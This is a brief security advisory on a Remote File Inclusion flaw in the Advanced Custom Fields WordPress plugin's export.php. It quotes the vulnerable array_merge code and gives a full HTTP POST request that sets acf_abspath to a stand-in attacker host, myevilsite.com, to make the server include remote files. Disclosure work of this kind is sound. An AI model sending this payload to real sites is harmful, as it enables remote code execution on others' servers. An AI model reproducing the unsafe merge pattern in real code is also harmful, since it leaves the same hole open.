Advisory
Analysis of vulnerability
A Remote File Inclusion vulnerability exists in the Advanced Custom Fields plugin for WordPress. The script /core/actions/export.php merges user input into its defaults with an unsafe call to array_merge, which makes it possible to override a value that is later used for an include:
```php
// vars
$defaults = array(
    'acf_abspath' => '../../../../../',
    'acf_posts' => array()
);

$my_options = array_merge( $defaults, $_POST );

require_once( $my_options['acf_abspath'] . 'wp-load.php');
require_once( $my_options['acf_abspath'] . 'wp-admin/admin.php');
```
Because $_POST is the second argument to array_merge, any key it contains replaces the corresponding default. By posting a different value for acf_abspath to the script, we can therefore overwrite the prefix used in the two require_once calls. For instance, the following request will cause the script to fetch /wp-load.php and /wp-admin/admin.php from myevilsite.com:
```http
POST /wordpress/wp-content/plugins/advanced-custom-fields/core/actions/export.php HTTP/1.1
Host: 192.168.80.130
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

acf_abspath=http://myevilsite.com
```